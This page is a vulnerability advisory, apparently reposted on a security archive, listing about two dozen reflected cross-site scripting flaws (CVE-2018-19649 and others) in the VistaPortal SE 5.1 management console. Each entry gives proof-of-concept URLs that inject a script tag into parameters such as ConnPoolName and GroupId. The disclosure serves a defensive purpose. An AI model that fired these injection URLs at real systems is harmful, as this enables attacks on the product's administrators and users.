exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

VistaPortal SE 5.1 Cross Site Scripting

VistaPortal SE 5.1 Cross Site Scripting
Posted Dec 7, 2018
Authored by Rafael Pedrero

VistaPortal SE version 5.1 build 51029 suffers from multiple cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss
advisories | CVE-2018-19649, CVE-2018-19765, CVE-2018-19766, CVE-2018-19767, CVE-2018-19768, CVE-2018-19769, CVE-2018-19770, CVE-2018-19771, CVE-2018-19772, CVE-2018-19773, CVE-2018-19774, CVE-2018-19775, CVE-2018-19809, CVE-2018-19810, CVE-2018-19811, CVE-2018-19812, CVE-2018-19813, CVE-2018-19814, CVE-2018-19815, CVE-2018-19816, CVE-2018-19817, CVE-2018-19818, CVE-2018-19819, CVE-2018-19820, CVE-2018-19821, CVE-2018-19822
SHA-256 | f59d7577f26cbbecae2b1018571826aaba20798e7d44c6ce40b3d5c9b1d55316

VistaPortal SE 5.1 Cross Site Scripting

Change Mirror Download
Complete list: CVE-2018-19649, CVE-2018-19765, CVE-2018-19766,
CVE-2018-19767, CVE-2018-19768, CVE-2018-19769, CVE-2018-19770,
CVE-2018-19771, CVE-2018-19772, CVE-2018-19773, CVE-2018-19774,
CVE-2018-19775, CVE-2018-19809, CVE-2018-19810, CVE-2018-19811,
CVE-2018-19812, CVE-2018-19813, CVE-2018-19814, CVE-2018-19815,
CVE-2018-19816, CVE-2018-19817, CVE-2018-19818, CVE-2018-19819,
CVE-2018-19820, CVE-2018-19821, CVE-2018-19822

<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19649
# Category: webapps

1. Description

Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "RolePermissions.jsp" has reflected XSS via ConnPoolName parameter.


2. Proof of Concept

http://X.X.X.X/VPortal/mgtconsole/RolePermissions.jsp?ConnPoolName=default%27%22%3E%3CScRiPt%3Ealert%28%22xss%22%29%3C/ScRiPt%3E&accessPath=Configuration,Roles&loginPath=_VP_Configuration,_VP_Roles

Vulnerable parameter: ConnPoolName


3. Solution:

Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->


<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19765
# Category: webapps

1. Description

Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "EditCurrentPresentSpace.jsp" has reflected XSS via ConnPoolName,
GroupId and ParentId parameters.


2. Proof of Concept

http://X.X.X.X/VPortal/mgtconsole/EditCurrentPresentSpace.jsp?ConnPoolName=default&GroupId=159&PageId=642&Category=root&ParentId=0
'"><ScRiPt>alert("xss")</ScRiPt>&type=U
http://X.X.X.X/VPortal/mgtconsole/EditCurrentPresentSpace.jsp?ConnPoolName=default&GroupId=159
'"><ScRiPt>alert("xss")</ScRiPt>&type=U&PageId=642&Category=root&ParentId=0
http://X.X.X.X/VPortal/mgtconsole/EditCurrentPresentSpace.jsp?ConnPoolName=
'"><ScRiPt>alert("xss")</ScRiPt>&type=U&GroupId=159&PageId=642&Category=root&ParentId=0

Vulnerable parameter: ConnPoolName, GroupId and ParentId


3. Solution:

Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->


<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19766
# Category: webapps

1. Description

Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "GroupRessourceAdmin.jsp" has reflected XSS via ConnPoolName
parameter.


2. Proof of Concept

http://X.X.X.X/VPortal/mgtconsole/GroupRessourceAdmin.jsp?ConnPoolName='"><ScRiPt>alert("xss")</ScRiPt>&type=U&accessPath=Configuration,Security
Resources&loginPath=_VP_Configuration,_VP_Security_Resources

Vulnerable parameter: ConnPoolName


3. Solution:

Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->


<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19767
# Category: webapps

1. Description

Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "PresentSpace.jsp" has reflected XSS via ConnPoolName and GroupId
parameters.


2. Proof of Concept

http://X.X.X.X/VPortal/mgtconsole/PresentSpace.jsp?type=P&GroupId=164&ConnPoolName='"><ScRiPt>alert("xss")</ScRiPt>&type=U&accessPath=Page
Packages,InfoVista
Solutions,ProServ,Test_Conectividad,Test_Conectividad_Package&loginPath=PagePackageMainFolder,InfoVista_Solutions,proserv,Test_Conectividad,Test_Conectividad_Package
http://X.X.X.X/VPortal/mgtconsole/PresentSpace.jsp?type=P&GroupId=164'"><ScRiPt>alert("xss")</ScRiPt>&type=U&ConnPoolName=default&accessPath=Page
Packages,InfoVista
Solutions,ProServ,Test_Conectividad,Test_Conectividad_Package&loginPath=PagePackageMainFolder,InfoVista_Solutions,proserv,Test_Conectividad,Test_Conectividad_Package

Vulnerable parameters: ConnPoolName and GroupId


3. Solution:

Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->


<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19768
# Category: webapps

1. Description

Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "SubPagePackages.jsp" has reflected XSS via ConnPoolName and
GroupId parameters.


2. Proof of Concept

http://X.X.X.X/VPortal/mgtconsole/SubPagePackages.jsp?type=F&GroupId=5&DispProfile=true&ConnPoolName='"><ScRiPt>alert("xss")</ScRiPt>&type=U&accessPath=Page
Packages&loginPath=PagePackageMainFolder
http://X.X.X.X/VPortal/mgtconsole/SubPagePackages.jsp?type=F&GroupId=5'"><ScRiPt>alert("xss")</ScRiPt>&type=U&DispProfile=true&ConnPoolName=default&accessPath=Page
Packages&loginPath=PagePackageMainFolder

Vulnerable parameters: ConnPoolName and GroupId


3. Solution:

Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->


<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19769
# Category: webapps

1. Description

Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "UserProperties.jsp" has reflected XSS via ConnPoolName.


2. Proof of Concept

http://X.X.X.X/VPortal/mgtconsole/UserProperties.jsp?ConnPoolName='"><ScRiPt>alert("xss")</ScRiPt>&type=U&accessPath=Configuration,User
Properties&loginPath=_VP_Configuration,_VP_User_Propertie

Vulnerable parameters: ConnPoolName


3. Solution:

Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->


<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19770
# Category: webapps

1. Description

Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "Users.jsp" has reflected XSS via ConnPoolName.


2. Proof of Concept

http://X.X.X.X/VPortal/mgtconsole/Users.jsp?GZIP=false&type=G&GroupId=6&DispProfile=true&ConnPoolName='"><ScRiPt>alert("xss")</ScRiPt>&type=U&accessPath=All,InfoVista
Solutions Users Groups&loginPath=All,InfoVista_Solutions_Users_Groups

Vulnerable parameters: ConnPoolName


3. Solution:

Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->


<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19771
# Category: webapps

1. Description

Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "EditCurrentPool.jsp" has reflected XSS via PropName parameter.


2. Proof of Concept

http://X.X.X.X/VPortal/mgtconsole/EditCurrentPool.jsp?PropName='"><ScRiPt>alert("xss")</ScRiPt>&type=U&accessPath=Configuration,VistaPortalA(r)
Database
Connection&loginPath=_VP_Configuration,_VP_VistaPortal_Database_Connection

Vulnerable parameter: PropName


3. Solution:

Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->


<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19772
# Category: webapps

1. Description

Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "EditCurrentPresentSpace.jsp" has reflected XSS via ConnPoolName,
GroupId and ParentId parameters.


2. Proof of Concept

http://X.X.X.X/VPortal/mgtconsole/EditCurrentPresentSpace.jsp?ConnPoolName=default&GroupId=4&PageId=1&Category=root&ParentId=0
'"><ScRiPt>alert("xss")</ScRiPt>&type=U
http://X.X.X.X/VPortal/mgtconsole/EditCurrentPresentSpace.jsp?ConnPoolName=default&GroupId=4
'"><ScRiPt>alert("xss")</ScRiPt>&type=U&PageId=1&Category=root&ParentId=0
http://X.X.X.X/VPortal/mgtconsole/EditCurrentPresentSpace.jsp?ConnPoolName=
'"><ScRiPt>alert("xss")</ScRiPt>&type=U&GroupId=4&PageId=1&Category=root&ParentId=0

Vulnerable parameter: ConnPoolName, GroupId and ParentId


3. Solution:

Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->


<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19773
# Category: webapps

1. Description

Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "EditCurrentUser.jsp" has reflected XSS via GroupId and
ConnPoolName parameters.


2. Proof of Concept

http://X.X.X.X/VPortal/mgtconsole/EditCurrentUser.jsp?GroupId=4&ConnPoolName='"><ScRiPt>alert("xss")</ScRiPt>&type=U&accessPath=All,Super
Administrator&loginPath=All,_superadmin_shadow_
http://X.X.X.X/VPortal/mgtconsole/EditCurrentUser.jsp?GroupId=4'"><ScRiPt>alert("xss")</ScRiPt>&type=U&ConnPoolName=default&accessPath=All,Super
Administrator&loginPath=All,_superadmin_shadow_

Vulnerable parameter: GroupId and ConnPoolName


3. Solution:

Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->


<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19774
# Category: webapps

1. Description

Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "PresentSpace.jsp" has reflected XSS via GroupId and ConnPoolName
parameters.


2. Proof of Concept

http://X.X.X.X/VPortal/mgtconsole/PresentSpace.jsp?GroupId=4&ConnPoolName=
'"><ScRiPt>alert("xss")</ScRiPt>&type=U&type=U
http://X.X.X.X/VPortal/mgtconsole/PresentSpace.jsp?GroupId=4
'"><ScRiPt>alert("xss")</ScRiPt>&type=U&ConnPoolName=default&type=U

Vulnerable parameter: GroupId and ConnPoolName


3. Solution:

Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->


<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19775
# Category: webapps

1. Description

Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "Variables.jsp" has reflected XSS via ConnPoolName and GroupId
parameter.


2. Proof of Concept

http://X.X.X.X/VPortal/mgtconsole/Variables.jsp?ConnPoolName=default&GroupId=4
'"><ScRiPt>alert("xss")</ScRiPt>&type=U&CurrentFolder=AdHo
http://X.X.X.X/VPortal/mgtconsole/Variables.jsp?ConnPoolName=
'"><ScRiPt>alert("xss")</ScRiPt>&type=U&GroupId=4&CurrentFolder=AdHo

Vulnerable parameter: ConnPoolName and GroupId


3. Solution:

Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->

<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19809
# Category: webapps

1. Description

Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "/VPortal/mgtconsole/GroupCopy.jsp" has reflected XSS via
ConnPoolName, GroupId and type parameters.


2. Proof of Concept

http://X.X.X.X/VPortal/mgtconsole/GroupCopy.jsp?type=P&GroupUserId=159&ConnPoolName=
'"><ScRiPt>alert("xss")</ScRiPt>
http://X.X.X.X/VPortal/mgtconsole/GroupCopy.jsp?type=P&GroupUserId=159
'"><ScRiPt>alert("xss")</ScRiPt>&ConnPoolName=default
http://X.X.X.X/VPortal/mgtconsole/GroupCopy.jsp?type=P
'"><ScRiPt>alert("xss")</ScRiPt>&GroupUserId=159&ConnPoolName=default

Vulnerable parameter: ConnPoolName, GroupId and type


3. Solution:

Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->


<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19810
# Category: webapps

1. Description

Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "/VPortal/mgtconsole/GroupMove.jsp" has reflected XSS via
ConnPoolName, GroupId and type parameters.


2. Proof of Concept

http://X.X.X.X/VPortal/mgtconsole/GroupMove.jsp?type=P&GroupUserId=159&ConnPoolName=
'"><ScRiPt>alert("xss")</ScRiPt>
http://X.X.X.X/VPortal/mgtconsole/GroupMove.jsp?type=P
'"><ScRiPt>alert("xss")</ScRiPt>&GroupUserId=159&ConnPoolName=default

Vulnerable parameter: ConnPoolName and type


3. Solution:

Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->


<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19811
# Category: webapps

1. Description

Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "/VPortal/mgtconsole/Import.jsp" has reflected XSS via
ConnPoolName parameter.


2. Proof of Concept

http://X.X.X.X/VPortal/mgtconsole/Import.jsp?type=Package&GroupUserId=159&ConnPoolName=
'"><ScRiPt>alert("xss")</ScRiPt>&ImportAs=159


Vulnerable parameter: ConnPoolName


3. Solution:

Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->


<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19812
# Category: webapps

1. Description

Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "/VPortal/mgtconsole/SubFolderPackages.jsp" has reflected XSS via
GroupId parameter.


2. Proof of Concept

http://X.X.X.X/VPortal/mgtconsole/SubFolderPackages.jsp?GroupId=5
'"><ScRiPt>alert("xss")</ScRiPt>&ConnPoolName=default&type=F

Vulnerable parameter: GroupId


3. Solution:

Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->


<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19813
# Category: webapps

1. Description

Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "/VPortal/mgtconsole/Subscribers.jsp" has reflected XSS via
ConnPoolName and GroupId parameters.


2. Proof of Concept

http://X.X.X.X/VPortal/mgtconsole/Subscribers.jsp?GroupId=159&ConnPoolName=
'"><ScRiPt>alert("xss")</ScRiPt>&type=P
http://X.X.X.X/VPortal/mgtconsole/Subscribers.jsp?GroupId=159
'"><ScRiPt>alert("xss")</ScRiPt>&ConnPoolName=default&type=P

Vulnerable parameter: ConnPoolName and GroupId


3. Solution:

Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->


<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19814
# Category: webapps

1. Description

Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "/VPortal/mgtconsole/Subscriptions.jsp" has reflected XSS via
ConnPoolName and GroupId parameters.


2. Proof of Concept

http://X.X.X.X/VPortal/mgtconsole/Subscriptions.jsp?GroupId=159&ConnPoolName=default&type=P
'"><ScRiPt>alert("xss")</ScRiPt>
http://X.X.X.X/VPortal/mgtconsole/Subscriptions.jsp?GroupId=159&ConnPoolName=
'"><ScRiPt>alert("xss")</ScRiPt>&type=P
http://X.X.X.X/VPortal/mgtconsole/Subscriptions.jsp?GroupId=159
'"><ScRiPt>alert("xss")</ScRiPt>&ConnPoolName=default&type=P

Vulnerable parameter: ConnPoolName, GroupId and type


3. Solution:

Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->


<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19815
# Category: webapps

1. Description

Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "/VPortal/mgtconsole/UserPopupAddNewProp.jsp" has reflected XSS
via ConnPoolName parameter.


2. Proof of Concept

http://X.X.X.X/VPortal/mgtconsole/UserPopupAddNewProp.jsp?ConnPoolName=
'"><ScRiPt>alert("xss")</ScRiPt>

Vulnerable parameter: ConnPoolName


3. Solution:

Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->


<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19816
# Category: webapps

1. Description

Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "/VPortal/mgtconsole/categorytree/ChooseCategory.jsp" has
reflected XSS via ConnPoolName parameter.


2. Proof of Concept

http://X.X.X.X/VPortal/mgtconsole/categorytree/ChooseCategory.jsp?ConnPoolName=
'"><ScRiPt>alert("xss")</ScRiPt>

Vulnerable parameter: ConnPoolName


3. Solution:

Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->


<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19817
# Category: webapps

1. Description

Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "/VPortal/mgtconsole/AdminAuthorisationFrame.jsp" has reflected
XSS via ConnPoolName and GroupId parameters.


2. Proof of Concept

http://X.X.X.X/VPortal/mgtconsole/AdminAuthorisationFrame.jsp?GroupId=4&UserId=4&ConnPoolName=
'"><ScRiPt>alert("xss")</ScRiPt>&type=U
http://X.X.X.X/VPortal/mgtconsole/AdminAuthorisationFrame.jsp?GroupId=4
'"><ScRiPt>alert("xss")</ScRiPt>&UserId=4&ConnPoolName=default&type=U

Vulnerable parameter: ConnPoolName and GroupId


3. Solution:

Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->


<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19818
# Category: webapps

1. Description

Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "/VPortal/mgtconsole/Contacts.jsp" has reflected XSS via
ConnPoolName parameter.


2. Proof of Concept

http://X.X.X.X/VPortal/mgtconsole/Contacts.jsp?GroupId=4&ConnPoolName=
'"><ScRiPt>alert("xss")</ScRiPt>&type=U

Vulnerable parameter: ConnPoolName


3. Solution:

Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->


<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19819
# Category: webapps

1. Description

Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "/VPortal/mgtconsole/Rights.jsp" has reflected XSS via
ConnPoolName parameter.


2. Proof of Concept

http://X.X.X.X/VPortal/mgtconsole/Rights.jsp?GroupId=4&ConnPoolName=
'"><ScRiPt>alert("xss")</ScRiPt>&type=U

Vulnerable parameter: ConnPoolName


3. Solution:

Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->


<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19820
# Category: webapps

1. Description

Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "/VPortal/mgtconsole/Roles.jsp" has reflected XSS via ConnPoolName
parameter.


2. Proof of Concept

http://X.X.X.X/VPortal/mgtconsole/Roles.jsp?GroupId=4&ConnPoolName=
'"><ScRiPt>alert("xss")</ScRiPt>&type=U

Vulnerable parameter: ConnPoolName


3. Solution:

Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->


<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19821
# Category: webapps

1. Description

Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "/VPortal/mgtconsole/SecurityPolicies.jsp" has reflected XSS via
ConnPoolName parameter.


2. Proof of Concept

http://X.X.X.X/VPortal/mgtconsole/SecurityPolicies.jsp?GroupId=4&ConnPoolName=
'"><ScRiPt>alert("xss")</ScRiPt>&type=U

Vulnerable parameter: ConnPoolName


3. Solution:

Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->


<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19822
# Category: webapps

1. Description

Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "/VPortal/mgtconsole/SharedCriteria.jsp" has reflected XSS via
ConnPoolName and GroupId parameters.


2. Proof of Concept

http://X.X.X.X/VPortal/mgtconsole/SharedCriteria.jsp?GroupId=4&ConnPoolName=
'"><ScRiPt>alert("xss")</ScRiPt>&type=U
http://X.X.X.X/VPortal/mgtconsole/SharedCriteria.jsp?GroupId=4
'"><ScRiPt>alert("xss")</ScRiPt>&ConnPoolName=default&type=U

Vulnerable parameter: ConnPoolName and GroupId


3. Solution:

Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->


Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    28 Files
  • 16
    Jul 16th
    6 Files
  • 17
    Jul 17th
    34 Files
  • 18
    Jul 18th
    6 Files
  • 19
    Jul 19th
    34 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
